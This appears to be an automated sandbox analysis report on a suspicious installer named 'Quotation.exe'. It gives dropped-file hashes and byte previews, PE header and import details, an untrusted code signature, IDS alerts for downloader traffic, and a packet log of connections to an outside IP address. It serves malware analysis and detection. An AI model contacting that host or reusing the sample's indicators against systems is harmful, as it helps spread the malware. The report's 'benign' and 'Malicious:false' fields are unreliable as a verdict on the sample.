                                                            Antivirus:
                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                            Joe Sandbox View:
                                                            • Filename: CERTIFICADO TITULARIDAD.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, Detection: malicious, Browse
                                                            • Filename: SecuriteInfo.com.Win32.Malware-gen.4932.17674.exe, Detection: malicious, Browse
                                                            • Filename: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious, Browse
                                                            • Filename: D#U00dcZELT#U0130LD#U0130 S#U00d6ZLE#U015eME-pdf.bat.exe, Detection: malicious, Browse
                                                            • Filename: UMOWA_PD.BAT.exe, Detection: malicious, Browse
                                                            • Filename: UMOWA_PD.BAT.exe, Detection: malicious, Browse
                                                            • Filename: Payment_Advice.1.bat.exe, Detection: malicious, Browse
                                                            • Filename: Payment_Advice..exe, Detection: malicious, Browse
                                                            • Filename: Payment_Advice..exe, Detection: malicious, Browse
                                                            Reputation:moderate, very likely benign file
                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...S.d...........!....."...........*.......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text.... .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                            C:\Users\user\ethnocentrism\skggene\Egyptians218\Chervil.Oms

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):336059
                                                            Entropy (8bit):7.685795992578951
                                                            Encrypted:false
                                                            SSDEEP:6144:qlpgooECED9kKq/KQn/NLhyHn8d1pCTnDegKywAzhH/eBCV6nK:agd+kKq/lTyHn8Tkel4deBCMnK
                                                            MD5:02E289B40EC2F4B3300D0A1A42C7C26D
                                                            SHA1:3036ADF93F4E602DD419FFDE5DC305598CC687F8
                                                            SHA-256:4300DEEF2FFF5C90A22D98006F2DD1A9050929CD90E28BAF375E6A6D07B7196A
                                                            SHA-512:79AABB29E98064391B83636B425E68E074D7387F71ABEE3D92822E19EB41A081CA4DB5FA38713C2882775246A6A38E13F1E82CF434025E9A9C403D95F57FB25E
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:......I....ww....ss.........../.........NN..r....tt......"...........h...###.."..........R......."""...........ee.............................:..................................O......kkk..>>.................1...yy.......44..........^.l........Y..#....t...f......&..p........j.OlY...T[...2..>..-...(.f.........<.u.... .r..J5.b2.I|'&.*.......e*..ZK.'.....<......,...:fi....f.v..+y0.1...QdqH...BN.?V..4w8.{..m.g"6.7oP...x./.g......>..D....\C..}..#....=^..WS...._;.......EF..3.../.........f........H..A....9..%...Lt@......$.....!.H=....+....G..p........j.OlY...T[. .f......H.2..>..-...(..u.... .r..J5.b2.I|'&.*.......e*..ZK.'.....<......,.....i..2......#fiay0.1...QdqH...BN.?V..4w8.{..m.g........6.7oP...x...D....\C..}..#......f.s....?=^..WS...._;.......EF..3.../............A....9..%...Lt@.....8.G..u.f....A...$.....!.H=....+....G..p........j.OlY...T[...2..>..-...(...f....i..<.u.... .r..J5.b2.I|'&.*.......e*..ZK.'.....<......,...:fi...f....+y0.1...QdqH...

                                                            C:\Users\user\ethnocentrism\skggene\Egyptians218\Ipecacs.txt

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                            File Type:ASCII text, with CRLF line terminators
                                                            Category:dropped
                                                            Size (bytes):373
                                                            Entropy (8bit):4.272746850105327
                                                            Encrypted:false
                                                            SSDEEP:6:6IXKBWL5apAUHkR+HFm0V/cyl5D0ETOrMJVD3DyMOA+JC5HHrAkud4rKsXk3lMn3:6wZapAloN/cyl6ETOkV/faGs1VU3
                                                            MD5:0682CF0C326528B5BA6E9AC2042D9A00
                                                            SHA1:EDE298B8E7EBB1DB030AE121E50231B9FC3ACD55
                                                            SHA-256:1CA49FA8260240725688ADFB399DDC7DB516B7EAC4A5136A624AF5E231EBDB6D
                                                            SHA-512:76E19E89659E67D30BC1C171622D2884D5A578828F89EF7BB138D036A42560307F2E72C2924381E226049AC94AB4A16944FA8113E4E9EE22FF39F7F4CA61EC8B
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:hatikvah gldstning finansloven favourables.minutviserne slidgigts coumalic drollingly biogassens comprachicos sinningly.eboulement flapper haandbogens algebraizations filoperationer kontaktpersonens..nekromantikers cattier skifertkket,sempres aldersprsident deploys fremmet.bestialskes gangafstands totalitarismes entoils himmelblaa feteret fidusmageriernes billedskrifts..

                                                            C:\Users\user\ethnocentrism\skggene\Egyptians218\Phosphorises50.pro

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):355104
                                                            Entropy (8bit):1.2517572138569224
                                                            Encrypted:false
                                                            SSDEEP:768:vBV5n0H6bwRwLskHSX1dUZThdnbTc0og7ZSDUEyN/Kr70+jPbuLi9C42IR+ieakD:XbI0oy4FIi8/4GkpM1Yv+eq
                                                            MD5:DC1F74F786EB4B2603992B0F28E08486
                                                            SHA1:0FB18798B3D067CC05FC67F72F126438D14F3EEF
                                                            SHA-256:D13ABD4F2B194A042074D7E6E2B39526FDF74A432C44BFE380FB7ADAC837A9EB
                                                            SHA-512:8544226245581C50A295F077EC297F6F288EEC7A9525CA891C44BA6A01246D0D146EA78763EC5B850C0FBE01A456EA31F46FC6890244DFC99C3C9483C42CAAC2
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:..................................+................................d...........g....................................................d.....T........................................A..^.................................&.....3...............................................8................:...F......................]...........F......................./....................Z....................................................}.......#.............e.....................................................................................................................................................|..C.....O...................................'.....................e....;.....)...............................................................................2.........................................O.............!................................\...............~...............s.........l....................5..C..........................................6..........|..................8.................

                                                            C:\Users\user\ethnocentrism\skggene\Egyptians218\Uudsigelig.Taa

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):145899
                                                            Entropy (8bit):4.620235574919702
                                                            Encrypted:false
                                                            SSDEEP:1536:AQ9cCEgX0PvPgQff3y+lsybfc/paAlt5jF7w7s/z3+QbEjLM2LwPSYOu9K/h66mt:V1X0XPZB2yb0M37CvEM2Leahpmpv
                                                            MD5:8D795C6A7B5744F6512A4853C455AC01
                                                            SHA1:64B46909F5D347DDADC97CAA4C6BFB1EFB06CC5A
                                                            SHA-256:68F8D69EB8AC4B378CC707CBA4C46F1342294FD7090B43D8791C75E4D7E79A81
                                                            SHA-512:E7C98409C3A712717130F25BA557C92E13559965C5B061F64DFCF739D0FCE822760272637E6D955C8444E9890C8CE331A78C92B1DC8E158410BDCE3EA50DBE20
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.................................TTT..........................................`...................F............u..................SS..........!..............u.=..xxxxxxx......%.............F.......Q.SSSS....qq......)).........N......nnnnn......AA.O..............F...........dd....................................LL..x........................ZZ........c..................m..........kk.-...............P.cc.....N.................222.........MMM.........KKK.............................CCCC......v.............................T..................................c...................2.!......'................%.PPP....................,.......QQ..cccc......|....ff....lll........h.................^^.......................ll...........nn................||.F..W..................$$......................TT..oo............s...CC.lllll..............xx....................F....''.........................................]]]...........00........................................Q..~~~...........>>>....:.........

                                                            C:\Users\user\ethnocentrism\skggene\Egyptians218\benniseed.pen

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):398408
                                                            Entropy (8bit):1.2541470481941865
                                                            Encrypted:false
                                                            SSDEEP:768:XLcoKgaILqV22/BVLR+CqlRO+6UMdZH2MHoOXeHBaLYQ/zLN8vHN6Bqg+R+5bP1P:XLvaVDBsdDUwU8ftgTd+C9Rs8
                                                            MD5:A82E7BBC06096A0D4DA946CB590D39E5
                                                            SHA1:6E766E5C6394AE7012EF3A2A9B5F60B1530D82C2
                                                            SHA-256:839929F76FCFE7E5845C32D7A8BA32E022358D2B91C338D76CCE06D8201B816C
                                                            SHA-512:DDBA5A1391834BE21B53BC71071A7B9E59274F1C32337417D2EFE422632BF96A678D695E63790BD9AC86DFFF75BB1920C5796DEF03F1784383BB7C6219B9C971
                                                            Malicious:false
                                                            Reputation:low
                                                            Preview:.............................r................x...........U............................#....E...............................................G...........,......<M...........................................Z.............%......................................................................................................................................r................B................................7........................%........d.................<....[................................v......................................................._.............:....N...........................0.............................../..................1....................Y.....3..+.........9......A........t.........................^.....................[.......|................z.......................................................m................._............................<................D..$............L...D.......V...............................!.....p....................................

                                                            C:\Users\user\ethnocentrism\skggene\Egyptians218\hobroer.sml

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):227396
                                                            Entropy (8bit):1.2530859401625676
                                                            Encrypted:false
                                                            SSDEEP:768:gIyS4vBPb5KHsHjNXRzFiGNayC9sdCuO2eGx7UIpy01EPJTCVOy7KWWTYjypuSU7:w/DjoGsr6TpSzhsJmPn
                                                            MD5:82841FB39343FC19CE14AC4FA68A5777
                                                            SHA1:CDE9D16579DCC3387D3535C2835EE6F728D14F7A
                                                            SHA-256:394256420FEF9D66B56217A51643E2A4A2FA7C64930C7D71C95621FDAA92A3D9
                                                            SHA-512:33059AE752CA3EEF81E4510E6F2EB3C1ACAACDB30F81D89CCD57E9C918F61CBED6E768D41ABEAFA6C28DF6DE08AC5D14FBFCC9012AB4408BE3E197AB77017E7F
                                                            Malicious:false
                                                            Preview:.................................................%.............................[................H.............................t....................................q..................P..........C.............................c..............a................".............................................................................L......................g..............................................~.........................................%................%..............................m.........................XU.................F...............................................*.............. .........................................].....................................................................hR..................................u..............................................j........................................J..............................................a.......c..........................................}.D...l............................................g............

                                                            C:\Users\user\ethnocentrism\skggene\Egyptians218\skaftevves.bor

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):214298
                                                            Entropy (8bit):1.269910282868063
                                                            Encrypted:false
                                                            SSDEEP:768:1Q4u1xemsnw5v7I+7hvIqeXaekN3UUYG09jzsjrne0KWlsXr5COJxLePaDw50fEY:SfRNVNBf+EWbA3EZOo
                                                            MD5:6C494DB16E43F8AC50D8B2F6286018ED
                                                            SHA1:4D1685B1C9910C56907CDE3B9F9ECAD026CB5452
                                                            SHA-256:9B8646AAB1D81935430CB04886347E78DBE221A929E2B83D245066587AAC6D4C
                                                            SHA-512:3CD4ACF5FEB9613D706413469D63EFD0B5E3D10A8DC9B9E98C822FA99BDD47D481F5BF6CB0ADC7BD1086C9166C7309CD219142A3DA84FBA2026C7847E811AAA1
                                                            Malicious:false
                                                            Preview:....k..............h......................u.....$.+...................%.........................y...........................................W...............t................................................................?........................................#.c..........................>............................!.............................................#.................!............1.................]..........Wr......7....................*..........Z.c........[............5..............F...........................7..........................................................................0.....................&.....................................................................%....................................................................................................U...........................................................T.................z............................i......?...........................i.......N.......................f...................b....

                                                            C:\Users\user\ethnocentrism\skggene\Egyptians218\tastefejls.ant

                                                            Download File
                                                            Process:C:\Users\user\Desktop\Quotation.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):228290
                                                            Entropy (8bit):1.244318325113103
                                                            Encrypted:false
                                                            SSDEEP:768:G7vhTgPtsggM49EMnFuc4uIiRRc9go4HRuy/T0gHNIOeMROQTIPox3vgeBj6Wgd8:Gzvxjx5T4wYlu6gzJ7
                                                            MD5:22014F703A11E58AE60FF694BD36C788
                                                            SHA1:46D0F9990D492D396CFD827546E76A20AD8BCA73
                                                            SHA-256:964090AB5367EFD0FAC687630F3AEEF67755FEC32DA9EF84DBC9499557B1445B
                                                            SHA-512:0FC6A473F07BD387106B8465FA4DA003EC212C28C335DA1F81E8C60C5D9788F9C2F724F0802886375EF74EE390AB8F763B395EE7902BD110A3DE57E7573C95EE
                                                            Malicious:false
                                                            Preview:.....=.....?.............................................%........................[......j............................................ .......................\.............................&................u...........r..6............F..................................................................V.................9......................................................n....................................................(..................h..................U..............................(......A.....................................R....)..........................................U...I..............................j......_.......j....6............................................T&..........................................................................................................[.......<..................H.......................................................................t.....T..............................................................................'..;................

                                                            Static File Info

                                                            General

                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                            Entropy (8bit):7.944429250308074
                                                            TrID:
                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                            • DOS Executable Generic (2002/1) 0.02%
                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                            File name:Quotation.exe
                                                            File size:690'000 bytes
                                                            MD5:0a4e34ccc6e3e118f225a4f38f731a14
                                                            SHA1:d8f89c49dbf6376607ea5379963bd95973fbfd18
                                                            SHA256:5bdeae823decc2e03dbe71ea05e7ea871badc0865c0a2d0580d69761e1175900
                                                            SHA512:9fe90ed6095223ee98eb1372708cf77c7b2cd2482899bded7bd9f99f823afdeb89370309e0a087000e4345dab4b10a428ffd1d0afa486b7091f8fc3f30d0cc70
                                                            SSDEEP:12288:1XFAO9mjNkvzScpPdK/Pr595FUCCVjscJ4nX0q2mY9+QQh3HEc:1XFNQyvzSYlCNIV+nX0q2I3HEc
                                                            TLSH:56E423A573B5D18BD8E2067D44739EB11ED5FE2103680307E3503B3FEE619A2D50AB6A
                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN.*_...PN..PO.JPN.*_...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...c..d.................f...".....

                                                            File Icon

                                                            Icon Hash:1f2339d96f221e03

                                                            Static PE Info

                                                            General

                                                            Entrypoint:0x4034fc
                                                            Entrypoint Section:.text
                                                            Digitally signed:true
                                                            Imagebase:0x400000
                                                            Subsystem:windows gui
                                                            Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                            DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                            Time Stamp:0x64A0DC63 [Sun Jul 2 02:09:39 2023 UTC]
                                                            TLS Callbacks:
                                                            CLR (.Net) Version:
                                                            OS Version Major:4
                                                            OS Version Minor:0
                                                            File Version Major:4
                                                            File Version Minor:0
                                                            Subsystem Version Major:4
                                                            Subsystem Version Minor:0
                                                            Import Hash:f4639a0b3116c2cfc71144b88a929cfd

                                                            Authenticode Signature

                                                            Signature Valid:false
                                                            Signature Issuer:CN=Cumar, O=Cumar, L=Allakaket, C=US
                                                            Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                            Error Number:-2146762487
                                                            Not Before, Not After
                                                            • 16/07/2024 07:03:02 16/07/2027 07:03:02
                                                            Subject Chain
                                                            • CN=Cumar, O=Cumar, L=Allakaket, C=US
                                                            Version:3
                                                            Thumbprint MD5:ECEE05B918780F37502B83206CA78B0E
                                                            Thumbprint SHA-1:6DE1F22E2FB7CCB64DFC7DE90B6003DB1640EEEE
                                                            Thumbprint SHA-256:5D59B5AA6C57A532C45CB4177EDB9F141BA4B64FBF08E79B347B5CD3786DDD93
                                                            Serial:12CCDCD1467EB0188E954DAD81F229922F8C4669

                                                            Entrypoint Preview

                                                            Instruction
                                                            sub esp, 000003F8h
                                                            push ebp
                                                            push esi
                                                            push edi
                                                            push 00000020h
                                                            pop edi
                                                            xor ebp, ebp
                                                            push 00008001h
                                                            mov dword ptr [esp+20h], ebp
                                                            mov dword ptr [esp+18h], 0040A2D8h
                                                            mov dword ptr [esp+14h], ebp
                                                            call dword ptr [004080A4h]
                                                            mov esi, dword ptr [004080A8h]
                                                            lea eax, dword ptr [esp+34h]
                                                            push eax
                                                            mov dword ptr [esp+4Ch], ebp
                                                            mov dword ptr [esp+0000014Ch], ebp
                                                            mov dword ptr [esp+00000150h], ebp
                                                            mov dword ptr [esp+38h], 0000011Ch
                                                            call esi
                                                            test eax, eax
                                                            jne 00007F04306C52DAh
                                                            lea eax, dword ptr [esp+34h]
                                                            mov dword ptr [esp+34h], 00000114h
                                                            push eax
                                                            call esi
                                                            mov ax, word ptr [esp+48h]
                                                            mov ecx, dword ptr [esp+62h]
                                                            sub ax, 00000053h
                                                            add ecx, FFFFFFD0h
                                                            neg ax
                                                            sbb eax, eax
                                                            mov byte ptr [esp+0000014Eh], 00000004h
                                                            not eax
                                                            and eax, ecx
                                                            mov word ptr [esp+00000148h], ax
                                                            cmp dword ptr [esp+38h], 0Ah
                                                            jnc 00007F04306C52A8h
                                                            and word ptr [esp+42h], 0000h
                                                            mov eax, dword ptr [esp+40h]
                                                            movzx ecx, byte ptr [esp+3Ch]
                                                            mov dword ptr [00429AD8h], eax
                                                            xor eax, eax
                                                            mov ah, byte ptr [esp+38h]
                                                            movzx eax, ax
                                                            or eax, ecx
                                                            xor ecx, ecx
                                                            mov ch, byte ptr [esp+00000148h]
                                                            movzx ecx, cx
                                                            shl eax, 10h
                                                            or eax, ecx
                                                            movzx ecx, byte ptr [esp+0000004Eh]

                                                            Rich Headers

                                                            Programming Language:
                                                            • [EXP] VC++ 6.0 SP5 build 8804

                                                            Data Directories

                                                            NameVirtual AddressVirtual Size Is in Section
                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x84fc0xa0.rdata
                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x4e0000x6e38.rsrc
                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0xa75880x11c8
                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_IAT0x80000x2a8.rdata
                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                            Sections

                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                            .text0x10000x65560x6600dd25e171f2e0fe45f2800cc9e162537dFalse0.6652113970588235data6.456753840355455IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                            .rdata0x80000x13580x1400f0b500ff912dda10f31f36da3efc8a1eFalse0.44296875data5.102094016108248IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                            .data0xa0000x1fb380x6002bc02714ee74ba781d92e94eeaccb080False0.501953125data4.040639308682379IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .ndata0x2a0000x240000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                            .rsrc0x4e0000x6e380x700047ffad5a0fe61c18388c530528acf3b4False0.48440987723214285data5.489502239559345IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                                            Resources

                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                            RT_ICON0x4e3880x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.39066390041493776
                                                            RT_ICON0x509300x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishUnited States0.6287523452157598
                                                            RT_ICON0x519d80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishUnited States0.5791577825159915
                                                            RT_ICON0x528800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishUnited States0.680956678700361
                                                            RT_ICON0x531280x668Device independent bitmap graphic, 48 x 96 x 4, image size 0EnglishUnited States0.3128048780487805
                                                            RT_ICON0x537900x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishUnited States0.5375722543352601
                                                            RT_ICON0x53cf80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.7269503546099291
                                                            RT_ICON0x541600x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishUnited States0.41263440860215056
                                                            RT_ICON0x544480x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishUnited States0.625
                                                            RT_DIALOG0x545700x100dataEnglishUnited States0.5234375
                                                            RT_DIALOG0x546700x11cdataEnglishUnited States0.6056338028169014
                                                            RT_DIALOG0x547900xc4dataEnglishUnited States0.5918367346938775
                                                            RT_DIALOG0x548580x60dataEnglishUnited States0.7291666666666666
                                                            RT_GROUP_ICON0x548b80x84dataEnglishUnited States0.6136363636363636
                                                            RT_VERSION0x549400x1b8COM executable for DOSEnglishUnited States0.5727272727272728
                                                            RT_MANIFEST0x54af80x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

                                                            Imports

                                                            DLLImport
                                                            ADVAPI32.dllRegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
                                                            SHELL32.dllSHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
                                                            ole32.dllCoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
                                                            COMCTL32.dllImageList_Destroy, ImageList_AddMasked, ImageList_Create
                                                            USER32.dllMessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
                                                            GDI32.dllGetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
                                                            KERNEL32.dlllstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishUnited States

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-11-12T07:35:17.147775+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.549704TCP
                                                            2024-11-12T07:35:47.375106+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.54983694.141.120.13780TCP
                                                            2024-11-12T07:35:56.451141+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.12.23.50443192.168.2.549882TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 12, 2024 07:35:46.441595078 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:46.497577906 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:46.497715950 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:46.498218060 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:46.502965927 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.375026941 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.375047922 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.375060081 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.375073910 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.375086069 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.375097036 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.375106096 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.375107050 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.375147104 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.375154972 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.513184071 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.513199091 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.513210058 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.513245106 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.513293028 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.513350964 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.513364077 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.513375044 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.513389111 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.513420105 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.513792038 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.513803005 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.513819933 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.513827085 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.513834953 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.513853073 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.513879061 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.514384031 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.514426947 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.514429092 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.514467001 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.651252031 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.651297092 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.651318073 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.651348114 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.651351929 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.651386976 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.651395082 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.651426077 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.651439905 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.651453018 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.651465893 CET804983694.141.120.137192.168.2.5
                                                            Nov 12, 2024 07:35:47.651470900 CET4983680192.168.2.594.141.120.137
                                                            Nov 12, 2024 07:35:47.651490927 CET4983680192.168.2.594.141.120.137
